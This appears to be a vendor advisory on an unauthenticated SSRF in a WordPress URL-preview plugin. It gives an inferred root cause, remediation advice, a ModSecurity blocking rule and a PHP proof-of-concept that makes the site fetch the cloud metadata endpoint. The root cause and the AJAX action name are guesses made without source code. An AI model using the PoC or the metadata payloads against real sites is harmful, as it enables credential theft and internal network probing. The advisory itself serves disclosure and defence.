Atomic Edge analysis of CVE-2026-12100 (metadata-based):
The URL Preview plugin (slug: link-preview) version 1.0 for WordPress contains an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. This flaw allows an attacker to force the WordPress server to make arbitrary HTTP requests to internal or external systems. The vulnerability carries a CVSS score of 7.2 (High) due to network-based, low-complexity exploitation without authentication.
Root Cause:
Based on the CWE-918 classification and the description, Atomic Edge analysis infers that the plugin accepts a user-supplied ‘url’ parameter through an AJAX handler, REST endpoint, or form submission. The plugin likely passes this URL directly to a server-side HTTP fetching function (e.g., wp_remote_get, curl_exec, file_get_contents) without validating that the destination is a legitimate, public URL. No hostname whitelist, IP range restriction, or protocol validation is applied. This inference stems from the specific mention of the ‘url’ parameter and the lack of authentication requirements. Without access to the source code, this root cause cannot be confirmed, but it aligns with common SSRF patterns in WordPress plugins that generate link previews.
Exploitation:
An unauthenticated attacker sends an HTTP GET or POST request to the plugin’s endpoint, typically `wp-admin/admin-ajax.php` with a known AJAX action (e.g., link_preview_fetch or url_preview). The attacker includes the ‘url’ parameter set to an internal IP address or service, such as `http://169.254.169.254/latest/meta-data/` (cloud metadata) or `http://127.0.0.1/wp-admin/admin-ajax.php` (loopback). The server processes this request and returns the fetched content in the response, revealing sensitive data. No authentication, nonce, or capability check is required.
Remediation:
To fix this SSRF vulnerability, the plugin must validate the ‘url’ parameter before making any outbound HTTP request. The developer should implement a strict allowlist of permitted URL schemes (HTTPS only) and block private and reserved IP ranges using functions like `wp_http_validate_url()` or a custom IP filter. Additionally, authentication and nonce checks must be added to the AJAX handler to prevent unauthenticated access. Using a dedicated HTTP library that enforces outbound-only connections and limits redirects to safe hosts would further harden the plugin.
Impact:
Successful exploitation enables an attacker to probe internal network services, steal cloud instance metadata (e.g., AWS IAM credentials), interact with internal APIs, and potentially execute administrative actions on local WordPress resources via loopback requests. Although the CVSS confidentiality and integrity impact are rated Low, the SSRF can expose high-value secrets depending on the environment. This vulnerability poses a critical risk to sites hosted on cloud platforms with metadata services or with sensitive internal services.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-12100 (metadata-based)
# Block SSRF attempts via AJAX action 'link_preview_fetch' with internal IPs or reserved hosts
# Assumes vulnerable AJAX action based on plugin slug 'link-preview'
# The rule chains to match the specific action and block common SSRF target patterns
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-12100 SSRF via URL Preview plugin AJAX',severity:'CRITICAL',tag:'CVE-2026-12100'"
SecRule ARGS_POST:action "@streq link_preview_fetch" "chain"
SecRule ARGS_POST:url "@rx ^https?://(127.0.0.1|10.|172.(1[6-9]|2[0-9]|3[0-1]).|192.168.|0.0.0.0|169.254.|::1|fc00:|fe80:)"
"t:none,id:20261995"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-12100 - URL Preview <= 1.0 - Unauthenticated Server-Side Request Forgery via 'url' Parameter
// This PoC demonstrates SSRF exploitation against the URL Preview WordPress plugin.
// It assumes the vulnerable AJAX action is 'link_preview_fetch' (inferred from plugin slug 'link-preview').
// The target URL can be an internal service like cloud metadata endpoint.
$target_url = 'http://169.254.169.254/latest/meta-data/'; // AWS metadata endpoint
$wp_site = 'http://example.com'; // Change to target WordPress site
$ajax_url = $wp_site . '/wp-admin/admin-ajax.php';
$action = 'link_preview_fetch'; // Inferred AJAX action; may need adjustment
$payload = [
'action' => $action,
'url' => $target_url
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200 && !empty($response)) {
echo "[+] SSRF successful. Response from internal service:n";
echo $response;
} else {
echo "[-] Exploit failed. HTTP code: $http_coden";
echo "[-] Response: $responsen";
}
?>
